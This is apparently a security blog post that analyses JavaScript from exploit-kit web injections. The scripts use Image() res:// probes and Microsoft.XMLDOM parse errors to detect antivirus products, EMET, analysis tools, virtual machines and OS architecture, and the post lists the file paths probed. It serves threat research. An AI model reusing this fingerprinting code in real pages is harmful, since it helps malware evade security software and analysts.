Software enumeration using Internet Explorer

We do regularly see software enumeration using Internet Explorer in web infections. It tries to find some specific files(at fixed locations) related to AV and other analysis tools and avoids further execution of the exploit.

There are two different techniques used:
    1. Image()
    2. Microsoft.XMLDOM – ActiveXObject()

They look for some file that is installed in some fixed location in any system. As of today, these techniques
doesn’t work in updated version of IE.

This is the usual Javascript code you will see in web injection to find
various software and OS architecutre..

1. Image()
    function Check(s) {
        x = new Image();
        x.onload = targetfunction();
        x.src = s;
        return 0;
    }
    Check(“res://C:\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus 5.0 for Windows Workstations\\shellex.dll/#2/#102”)

2. Microsoft.XMLDOM – ActiveXObject()
    function checksys(txt) {
        var gytyyr = new ActiveXObject(“Microsoft.XMLDOM“);
        gytyyr.async = true;
        gytyyr.loadXML(‘<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “res://’ + txt + ‘”>’);
        if (gytyyr.parseError.errorCode != 0) {
            var err = “Error Code: ” + gytyyr.parseError.errorCode + “\ n”;
            err += “Error Reason: ” + gytyyr.parseError.reason;
            err += “Error Line: ” + gytyyr.parseError.line;
            if (err.indexOf(“-2147023083”) > 0) {
                return 1;
            } else {
                return 0;
            }
        }
        return 0;
    }
    checksys(“c:\\Windows\\System32\\drivers\\kl1.sys”)

Malware authors used the second technique to find the OS arch type too.
    function arch() {
        try {
            var xmlDoc = new ActiveXObject(“Microsoft.XMLDOM”);
            xmlDoc.async = false;
            xmlDoc.loadXML(‘<!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “res://c:\\Program Files (x86)\\Internet Explorer\\iexplore.exe”>’);
            if (xmlDoc.parseError.errorCode == -2147023083)  {
                return 64;
            }
        }
        catch (ex) {
            return 0;
        }
        return 32;
    }

List of SYS/driver file paths searched for:
    c:\WINDOWS\system32\drivers\afwcore.sys
    c:\WINDOWS\system32\drivers\avgtpx86.sys
    c:\WINDOWS\system32\drivers\avipbb.sys
    c:\WINDOWS\system32\drivers\BkavAuto.sys
    c:\WINDOWS\system32\drivers\catflt.sys
    c:\WINDOWS\system32\drivers\cmderd.sys
    c:\Windows\System32\drivers\eamon.sys
    c:\WINDOWS\system32\drivers\econceal.sys
    c:\WINDOWS\system32\drivers\EstRtw.sys
    c:\WINDOWS\system32\drivers\FortiRdr.sys
    c:\WINDOWS\system32\drivers\FStopW.sys
    c:\WINDOWS\system32\drivers\HookHelp.sys
    c:\WINDOWS\system32\drivers\ImmunetProtect.sys
    c:\Windows\System32\drivers\kl1.sys
    c:\Windows\System32\drivers\klflt.sys
    c:\WINDOWS\system32\drivers\klif.sys
    c:\WINDOWS\system32\drivers\kneps.sys
    c:\WINDOWS\system32\drivers\MpFilter.sys
    c:\WINDOWS\system32\drivers\nvcw32mf.sys
    c:\Windows\System32\drivers\Parity.sys
    c:\Windows\System32\drivers\prl_boot.sys
    c:\Windows\System32\drivers\prl_fs.sys
    c:\Windows\System32\drivers\prl_kmdd.sys
    c:\Windows\System32\drivers\prl_memdev.sys
    c:\Windows\System32\drivers\prl_mouf.sys
    c:\Windows\System32\drivers\prl_pv32.sys
    c:\Windows\System32\drivers\prl_sound.sys
    c:\Windows\System32\drivers\prl_strg.sys
    c:\Windows\System32\drivers\prl_tg.sys
    c:\Windows\System32\drivers\prl_time.sys
    c:\Windows\system32\drivers\protreg.sys
    c:\Windows\system32\drivers\SophosBootDriver.sys
    c:\Windows\system32\drivers\SYMEVENT.SYS
    c:\Windows\system32\drivers\SysGuard.sys
    c:\windows\system32\drivers\tmactmon.sys
    c:\windows\system32\drivers\tmcomm.sys
    c:\windows\system32\drivers\TMEBC32.sys
    c:\windows\system32\drivers\tmeext.sys
    c:\windows\system32\drivers\tmevtmgr.sys
    c:\windows\system32\drivers\tmnciesc.sys
    c:\windows\system32\drivers\tmtdi.sys
    c:\Windows\system32\drivers\vbengnt.sys
    c:\Windows\System32\drivers\VBoxGuest.sys
    c:\Windows\System32\drivers\VBoxMouse.sys
    c:\Windows\System32\drivers\VBoxSF.sys
    c:\Windows\System32\drivers\VBoxVideo.sys
    c:\Windows\System32\drivers\vm3dmp.sys
    c:\Windows\System32\drivers\vmhgfs.sys
    c:\Windows\System32\drivers\vmmouse.sys
    c:\Windows\System32\drivers\vmnet.sys
    c:\Windows\System32\drivers\vmusbmouse.sys
    c:\Windows\system32\drivers\vmx86.sys
    c:\Windows\System32\drivers\vmxnet.sys
    c:\Windows\system32\drivers\WpsHelper.sys

List of EXE/DLL paths searched for:
    c:\PROGRA~1\Sophos\SOPHOS~1\SOPHOS~1.DLL
    c:\Program Files (x86)\7-Zip\7z.exe
    C:\Program Files (x86)\EMET 4.1\EMET.dll
    C:\Program Files (x86)\EMET 5.0\EMET.dll
    c:\Program Files (x86)\iTunes\iTunesHelper.exe
    C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 2013\x86\mfc42.dll/#2/#26567
    C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2013\x86\mfc42.dll/#2/#26567
    C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 2.0\x86\mfc42.dll/#2/#26567
    C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\x86\mfc42.dll/#2/#26567
    C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE 3.0\x86\mfc42.dll/#2/#26567
    C:\Program Files (x86)\Kaspersky Lab\Kaspersky PURE\mfc42.dll/#2/#26567
    c:\Program Files (x86)\Microsoft SQL Server\80\COM\sqlvdi.dll
    c:\Program Files (x86)\Microsoft SQL Server\90\COM\instapi.dll
    c:\Program Files\7-Zip\7z.exe
    C:\Program Files\a-squared Anti-Malware\a2cmd.exe
    C:\Program Files\agb7pro\agb.exe
    C:\Program Files\Agnitum\Outpost Security Suite Pro\acs.exe
    C:\Program Files\AhnLab\V3IS80\V3Main.exe
    c:\Program Files\AVG Secure Search\13.2.0.4\AVG Secure Search_toolbar.dll
    c:\Program Files\Bitdefender\Bitdefender 2013 BETA\Active Virus Control\avc3_000_001\avcuf32.dll
    c:\Program Files\Bitdefender\Bitdefender 2013 BETA\BdProvider.dll
    C:\Program Files\BkavHome\Bka.exe
    c:\Program Files\Common Files\AVG Secure Search\DNTInstaller\13.2.0\avgdttbx.dll
    c:\Program Files\Common Files\McAfee\SystemCore\mytilus3.dll
    c:\Program Files\Common Files\McAfee\SystemCore\mytilus3_worker.dll
    c:\Program Files\DrWeb\drwebsp.dll
    C:\Program Files\EMET 4.1\EMET.dll
    C:\Program Files\EMET 5.0\EMET.dll
    C:\Program Files\eScan\shortcut.exe
    C:\Program Files\ESET\ESET Smart Security\egui.exe
    C:\Program Files\ESTsoft\ALYac\AYLaunch.exe
    C:\Program Files\F-Secure\ExploitShield\fsesgui.exe
    c:\Program Files\F-Secure\FSPS\program\FSLSP.DLL
    c:\program files\f-secure\hips\fshook32.dll
    c:\program files\f-secure\scanner-interface\fsgkiapi.dll
    C:\Program Files\Fiddler2\Fiddler.exe
    C:\Program Files\Fortinet\FortiClient\FortiClient.exe
    C:\Program Files\FRISK Software\F-PROT Antivirus for Windows\FPWin.exe
    C:\Program Files\IKARUS\anti.virus\unGuardX.exe
    C:\Program Files\Immunet\ips.exe
    C:\Program Files\INCAInternet\nProtect Anti-Virus Spyware 3.0\nsphsvr.exe
    c:\Program Files\iTunes\iTunesHelper.exe
    C:\Program Files\JiangMin\AntiVirus\KVPopup.exe
    C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2009\mfc42.dll/#2/#26567
    C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2010\mfc42.dll/#2/#26567
    C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2011\avzkrnl.dll/#2/BBALL
    c:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2012\klwtblc.dll
    C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2012\x86\mfc42.dll/#2/#26567
    c:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\klwtblc.dll
    c:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\remote_eka_prague_loader.dll
    C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 2013\x86\mfc42.dll/#2/#26567
    C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 5.0 for Windows Workstations\shellex.dll/#2/#102
    C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 6.0 for Windows Workstations\shellex.dll/#2/#102
    C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 6.0\shellex.dll/#2/#102
    C:\Program Files\Kaspersky Lab\Kaspersky Anti-Virus 7.0\shellex.dll/#2/#102
    C:\Program Files\Kaspersky Lab\Kaspersky Endpoint Security 8 for Windows\avp.exe
    C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x86\mfc42.dll/#2/#26567
    C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 15.0.0\x86\mfc42.dll/#2/#26567
    C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2009\mfc42.dll/#2/#26567
    C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2010\mfc42.dll/#2/#26567
    C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2011\avzkrnl.dll/#2/BBALL
    C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2012\x86\mfc42.dll/#2/#26567
    C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 2013\x86\mfc42.dll/#2/#26567
    C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 6.0\shellex.dll/#2/#102
    C:\Program Files\Kaspersky Lab\Kaspersky Internet Security 7.0\shellex.dll/#2/#102
    C:\Program Files\Kaspersky Lab\Kaspersky PURE 2.0\x86\mfc42.dll/#2/#26567
    C:\Program Files\Kaspersky Lab\Kaspersky PURE 3.0\x86\mfc42.dll/#2/#26567
    C:\Program Files\Kaspersky Lab\Kaspersky PURE\mfc42.dll/#2/#26567
    c:\Program Files\McAfee\VirusScan Enterprise\RES0402\McShield.dll
    c:\Program Files\Microsoft SQL Server\80\COM\sqlvdi.dll
    c:\Program Files\Microsoft SQL Server\90\COM\instapi.dll
    C:\Program Files\Norman\Nse\Bin\nse.exe
    C:\Program Files\Norton Internet Security\Branding\muis.dll
    C:\Program Files\Norton Internet Security\Engine\21.1.0.18\asOEHook.dll/#2/#102
    C:\Program Files\Norton Internet Security\Engine\21.6.0.32\asOEHook.dll/#2/#102
    C:\Program Files\Oracle\VirtualBox Guest Additions\uninst.exe/#2/#110
    C:\Program Files\Parallels\Parallels Tools\Applications\setup_nativelook.exe/#2/#204
    C:\Program Files\PC Tools Antivirus Software\pctsGui.exe
    C:\Program Files\Quick Heal\Quick Heal Total Security\ARKIT.EXE
    C:\Program Files\Rising\RFW\RavMonD.exe
    C:\Program Files\Rising\RIS\LangSel.exe
    C:\Program Files\Sophos\Sophos Anti-Virus\SavMain.exe
    C:\Program Files\Sunbelt Software\Personal Firewall\cfgconv.exe
    C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
    C:\Program Files\Symantec\Symantec Endpoint Protection\DoScan.exe
    c:\Program Files\Symantec\Symantec Endpoint Protection\wpsman.dll
    C:\Program Files\Trend Micro\Titanium\UIFramework\uiWinMgr.exe
    C:\Program Files\ViRobotXP\Vrmonnt.exe
    C:\Program Files\VirusBuster\winpers.exe
    C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe/#2/#26567
    C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe/#2/#30996
    c:\Program Files\WinRAR\WinRAR.exe
    c:\Program Files\WinZip\WZSHLSTB.DLL
    c:\Program Files\WinZip\ZipSendB.dll
    D:\Program Files (x86)\EMET 4.1\EMET.dll
    d:\Program Files (x86)\EMET 5.0\EMET.dll
    d:\Program Files\EMET 4.1\EMET.dll
    d:\Program Files\EMET 5.0\EMET.dll

List of ActiveX loaded:
    Kaspersky.IeVirtualKeyboardPlugin.JavascriptApi.1
    Symantec.IPS.WebProtection.1

Advertisements
This entry was posted in Exploit, Exploit Kit, IE and tagged , , , . Bookmark the permalink.

2 Responses to Software enumeration using Internet Explorer

  1. Alex says:

    Could you explain in what version of IE the first technique works?

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s